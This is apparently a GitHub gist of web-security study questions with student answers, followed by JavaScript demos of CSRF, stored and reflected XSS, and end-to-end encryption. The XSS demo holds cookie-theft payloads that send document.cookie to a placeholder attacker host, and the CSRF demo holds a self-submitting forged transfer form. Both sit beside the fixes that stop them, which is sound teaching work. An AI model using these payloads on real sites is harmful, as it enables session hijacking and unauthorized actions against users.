@halitbatur
Last active July 18, 2024 08:52
Security Attacks

Modern Security Attacks

  1. What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?

  2. What is an XSS attack? And what is the connection between it and cookies/sessions? What are the two main categories of XSS?

  3. What is a phishing attack? How do attackers typically execute phishing attacks, and what are their primary goals?

  4. What is a man-in-the-middle (MITM) attack? How do attackers perform MITM attacks, and what can be the consequences for victims?

  5. What is End-to-End encryption (E2EE)? Provide an example of a well-known app using E2EE, and explain how that app uses it.

@NonhlanhlaMazibuko

Nhlanhla Msibi @Nhlanhla-advocate
Mpho Oganne
Nonhlanhla Mazibuko

  1. A Cross-Site Request Forgery (CSRF) attack is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. Essentially, the attacker tricks the victim into making an unwanted request to a server on which they are authenticated. The attacker needs to get the user to execute this malicious request. This is often done by embedding the request in a malicious link, image, or script on a web page that the user visits.

It's called a one-click attack because, typically, all it takes for the attack to be executed is a single click by the user on a seemingly harmless link or button. In many cases, the user doesn't even realize they are making the request because the action can be embedded in an invisible image or an automatically executing script.

  2. An XSS (cross-site scripting) attack exploits a vulnerability in web applications that allows attackers to inject malicious scripts into trusted websites. These scripts are then executed by unsuspecting users. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to an end user. The injected code is then delivered to other users who access the web page or web application. When these users' browsers load the page, they execute the malicious script as part of the normal content.

XSS attacks allow an attacker to execute scripts in the context of a user's browser, making it possible for them to potentially steal cookies and the session identifiers stored in the cookies. This can lead to session hijacking, where the attacker gains unauthorized access to the user's session and can impersonate the victim, performing actions and accessing data as if they were the legitimate user.

Main categories of XSS:

  • Stored XSS, also referred to as persistent XSS:
    An attacker may inject malicious content (referred to as the payload), most often JavaScript code, into the target application, which can then be stored in the application's database permanently. When a victim opens the affected web page in a browser, the XSS attack payload is served to the victim’s browser, which means that victims will end up executing the malicious script once the page is viewed in their browser. An example would be an attacker posting a comment on a blog post with the malicious code. The blog stores this comment in its database without proper sanitization. When other users view the blog post, the malicious script is executed in their browsers, potentially stealing their session cookies.

  • Reflected XSS:
    The attacker’s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. This often occurs when the user is tricked into clicking a malicious link or submitting a specially crafted form. The injected script is then included in the server's response to the user, and the browser executes it. This type of XSS is usually targeted at a single user.

  3. A phishing attack is a type of cyber attack where an attacker disguises themselves as a trustworthy entity to deceive individuals into divulging sensitive information such as usernames, passwords, credit card numbers, or other personal information. Phishing is a form of social engineering, relying on manipulating human psychology rather than exploiting technical vulnerabilities.

Crafting the Bait:
Email: The attacker creates a fake email that looks like it's from a legitimate source, like a bank, a social media site, or an online service. The email usually contains a message that aims to create a sense of urgency or curiosity, like a message that says "your account has been compromised, click here to secure it".

  4. A Man-in-the-Middle attack is a type of cyber attack where the attacker secretly intercepts and relays communication between two parties who believe they are directly communicating with each other. The attacker can eavesdrop, alter, or inject false information into the communication, effectively taking control of the conversation without the knowledge of the legitimate parties.

The consequences for the victim are:

Financial Loss:
Victims may experience unauthorized transactions or withdrawals from their bank accounts.
Businesses may suffer from theft of financial information or intellectual property.

  5. End-to-End Encryption is a method of data transmission where only the communicating users can read the messages. In E2EE, the data is encrypted on the sender's device and only decrypted on the recipient's device, ensuring that no intermediaries, including service providers, can access the contents of the communication.

WhatsApp uses end-to-end encryption (what they want us to believe).

When a user sends a message, it is encrypted on their device using a unique encryption key.
This encryption key is only known to the sender and the intended recipient. Even WhatsApp servers do not have access to this key.
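The "one click" CSRF described in answer 1, carried through as an added example (this is not code from the gist or from the commenters): the attacker's self-submitting page, the handler that accepts the forged request, and a hardened handler that checks the Origin header and a per-session token. Runs under Node.js with no dependencies; bank.example and attacker.example are placeholder hostnames, and the request objects are constructed to look like what a web framework would hand a route handler.

```javascript
// Added example, not part of the gist: a CSRF "one click" page and the
// server-side checks that defeat it. Node.js only, no dependencies.
// bank.example and attacker.example are placeholder hostnames.
const crypto = require("node:crypto");

const SITE_ORIGIN = "https://bank.example";

// The attacker's page. The victim only has to load it: the form submits itself
// and the browser attaches the victim's bank.example cookies to the POST
// (assuming the session cookie is not marked SameSite).
function attackerPage() {
  return [
    '<form id="f" method="POST" action="https://bank.example/transfer">',
    '  <input type="hidden" name="to" value="attacker">',
    '  <input type="hidden" name="amount" value="1000">',
    "</form>",
    "<script>document.getElementById('f').submit()</script>",
  ].join("\n");
}

// Vulnerable handler: the session cookie is the only thing checked, so a
// forged cross-site request from a logged-in victim is accepted.
function vulnerableTransfer(req, sessions) {
  const user = sessions[req.cookies.session];
  if (!user) return { status: 401 };
  return { status: 200, from: user, to: req.body.to, amount: Number(req.body.amount) };
}

// Per-session synchronizer token: embedded in forms the site itself serves, so
// a page on attacker.example has no way to learn it.
function issueCsrfToken(sessionId, csrfTokens) {
  const token = crypto.randomBytes(32).toString("hex");
  csrfTokens[sessionId] = token;
  return token;
}

// Hardened handler: two independent checks on top of the session cookie.
//  1. The Origin header must be our own site. Browsers add Origin to cross-site
//     POSTs and page script cannot override it. A missing Origin is rejected too.
//  2. The body must carry the session's token, compared in constant time.
function hardenedTransfer(req, sessions, csrfTokens) {
  const user = sessions[req.cookies.session];
  if (!user) return { status: 401 };

  if (req.headers.origin !== SITE_ORIGIN) {
    return { status: 403, reason: "cross-site or missing Origin" };
  }

  const expected = csrfTokens[req.cookies.session];
  const supplied = req.body.csrf_token;
  if (
    !expected ||
    typeof supplied !== "string" ||
    supplied.length !== expected.length ||
    !crypto.timingSafeEqual(Buffer.from(supplied), Buffer.from(expected))
  ) {
    return { status: 403, reason: "missing or wrong CSRF token" };
  }
  return { status: 200, from: user, to: req.body.to, amount: Number(req.body.amount) };
}

// Walk through the attack with constructed requests.
function demo() {
  const sessions = { s3ss10n: "alice" }; // constructed: alice is logged in
  const csrfTokens = {};
  const token = issueCsrfToken("s3ss10n", csrfTokens);

  // What the browser sends after loading attackerPage(): alice's cookie is
  // attached, Origin names the attacker's site, and there is no token.
  const forged = {
    cookies: { session: "s3ss10n" },
    headers: { origin: "https://attacker.example" },
    body: { to: "attacker", amount: "1000" },
  };
  // A real transfer from a form that bank.example served, carrying the token.
  const legit = {
    cookies: { session: "s3ss10n" },
    headers: { origin: SITE_ORIGIN },
    body: { to: "bob", amount: "50", csrf_token: token },
  };

  return {
    forgedVsVulnerable: vulnerableTransfer(forged, sessions).status,         // 200
    forgedVsHardened: hardenedTransfer(forged, sessions, csrfTokens).status, // 403
    legitVsHardened: hardenedTransfer(legit, sessions, csrfTokens).status,   // 200
  };
}

console.log(attackerPage());
console.log(demo());
```

Two caveats a practitioner would add: marking the session cookie `SameSite=Lax` or `Strict` stops the browser from attaching it to the cross-site POST in the first place, which is the cheapest fix, and a strict Origin check rejects non-browser clients that send no Origin header, so an API used by scripts needs the token route rather than the header route.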
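The stored and reflected XSS cases from answer 2, as an added example that is not code from the gist or the commenters: a comment list rendered from an in-memory "database" (stored), a search page that echoes its query (reflected), and the HTML escaping that fixes both. The payloads and attacker.example hostname are constructed for the demo; `containsActiveMarkup` is a stand-in for "would a browser execute this", not a real parser.

```javascript
// Added example, not from the gist: stored and reflected XSS in a tiny
// server-side renderer, plus the output escaping that removes both.
// Node.js, no dependencies. All input strings are constructed for the demo.

// Escaping for HTML text and attribute-value context. The browser decodes the
// entities when it renders, so the text shows up intact but is never parsed as
// markup. Other contexts (inside <script>, in a URL, in CSS) need different
// encoders; this one is only correct for element content and quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Stored XSS: comments go into a "database" (an array) and are later rendered
// to every visitor. The vulnerable renderer concatenates raw user input.
const commentDb = [];
function postComment(author, text) {
  commentDb.push({ author, text });
}
function renderCommentsVulnerable() {
  return commentDb.map((c) => `<li><b>${c.author}</b>: ${c.text}</li>`).join("");
}
function renderCommentsSafe() {
  return commentDb
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.text)}</li>`)
    .join("");
}

// Reflected XSS: the search page echoes the query from the URL straight back
// into the response. The payload lives only in the link the victim clicks.
function searchPageVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}
function searchPageSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Crude stand-in for "would the browser run this": is there a literal <script>
// tag, or an on* event handler attribute inside a literal tag?
function containsActiveMarkup(html) {
  return /<script\b|<[^>]*\son\w+\s*=/i.test(html);
}

// Classic cookie-theft payloads (constructed; attacker.example is a placeholder).
const STORED_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
const REFLECTED_PAYLOAD =
  "<img src=x onerror=\"fetch('https://attacker.example/c?'+document.cookie)\">";

function demo() {
  postComment("mallory", STORED_PAYLOAD); // stored once...
  postComment("alice", "Nice post <3"); // ...served to every later reader
  return {
    storedVulnerable: containsActiveMarkup(renderCommentsVulnerable()), // true
    storedSafe: containsActiveMarkup(renderCommentsSafe()), // false
    reflectedVulnerable: containsActiveMarkup(searchPageVulnerable(REFLECTED_PAYLOAD)), // true
    reflectedSafe: containsActiveMarkup(searchPageSafe(REFLECTED_PAYLOAD)), // false
    safeStillShowsText: renderCommentsSafe().includes("Nice post &lt;3"), // true
  };
}

console.log(demo());
```

The cookie-theft payloads only work if the session cookie is readable from script; setting it `HttpOnly` removes `document.cookie` from the picture, though an injected script can still act as the user from inside the page. Escaping on output, per context, is what actually closes the hole.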
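The E2EE shape from answer 5, with the relay server in the position of the man in the middle from answer 4, as an added example; this is not WhatsApp's code and not from the gist. It uses the Node.js `crypto` module only. Assumptions and simplifications: one static X25519 key agreement per pair of users, where the Signal protocol that WhatsApp uses runs an X3DH handshake and a Double Ratchet; a plain object stands in for the relay server; and the short key fingerprint plays the role of the "security code" users compare out of band to detect a server that substituted its own key.

```javascript
// Added example, not part of the gist and not WhatsApp's code: the shape of
// end-to-end encryption with a relay server in the middle. Node.js crypto only.
// Simplification: one static X25519 agreement per pair, instead of the X3DH
// handshake and Double Ratchet of the Signal protocol.
const crypto = require("node:crypto");

// Each device generates its own key pair; the private key never leaves it.
function generateIdentity() {
  return crypto.generateKeyPairSync("x25519");
}

// Both ends derive the same 32-byte AES key from their own private key and the
// peer's public key. The server holds only public keys, so it cannot.
function deriveSharedKey(myPrivateKey, theirPublicKey) {
  const secret = crypto.diffieHellman({ privateKey: myPrivateKey, publicKey: theirPublicKey });
  return Buffer.from(crypto.hkdfSync("sha256", secret, Buffer.alloc(0), "e2ee-demo", 32));
}

// Short fingerprint of a public key. Users compare it out of band to detect a
// server (or any MITM) that handed them a substituted public key.
function fingerprint(publicKey) {
  const der = publicKey.export({ type: "spki", format: "der" });
  return crypto.createHash("sha256").update(der).digest("hex").slice(0, 32);
}

// AES-256-GCM: confidentiality plus an authentication tag that catches any
// tampering in transit. The routing header stays readable by the server (it has
// to deliver the message) but is bound to the ciphertext as additional data.
function encryptMessage(key, plaintext, header) {
  const nonce = crypto.randomBytes(12);
  const cipher = crypto.createCipheriv("aes-256-gcm", key, nonce);
  cipher.setAAD(Buffer.from(header));
  const ct = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  return { header, nonce, ct, tag: cipher.getAuthTag() };
}

function decryptMessage(key, env) {
  const d = crypto.createDecipheriv("aes-256-gcm", key, env.nonce);
  d.setAAD(Buffer.from(env.header));
  d.setAuthTag(env.tag);
  return Buffer.concat([d.update(env.ct), d.final()]).toString("utf8");
}

// Returns null instead of throwing when the key or the data is wrong.
function tryDecrypt(key, env) {
  try {
    return decryptMessage(key, env);
  } catch {
    return null;
  }
}

function demo() {
  const alice = generateIdentity();
  const bob = generateIdentity();
  // The relay server: a public-key directory plus a mailbox. It never holds a
  // private key or a plaintext.
  const server = { directory: { alice: alice.publicKey, bob: bob.publicKey }, inbox: [] };

  // Alice encrypts for Bob on her own device and hands the envelope to the server.
  const aliceKey = deriveSharedKey(alice.privateKey, server.directory.bob);
  server.inbox.push(encryptMessage(aliceKey, "meet at 9", "alice->bob"));

  // Bob fetches the envelope and decrypts with the key he derives himself.
  const bobKey = deriveSharedKey(bob.privateKey, server.directory.alice);
  const delivered = server.inbox[0];

  // The server has nothing but the envelope; any key it guesses fails the tag.
  const serverView = tryDecrypt(crypto.randomBytes(32), delivered);

  // A relay that flips one ciphertext bit is caught by the same tag.
  const tampered = { ...delivered, ct: Buffer.from(delivered.ct) };
  tampered.ct[0] ^= 0x01;

  return {
    keysMatch: aliceKey.equals(bobKey), // true
    plaintext: tryDecrypt(bobKey, delivered), // "meet at 9"
    serverView, // null
    tamperedView: tryDecrypt(bobKey, tampered), // null
    fingerprintsAgree: fingerprint(server.directory.alice) === fingerprint(alice.publicKey), // true
  };
}

console.log(demo());
```

The point the fingerprint check makes: encryption alone does not stop a MITM. If the directory served Bob a key the server generated, Bob would happily derive a shared secret with the server instead of with Alice, and the server could decrypt and re-encrypt every message. Only comparing fingerprints over a second channel (in person, a phone call) exposes that substitution, which is why messaging apps surface a security code to scan or read out.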
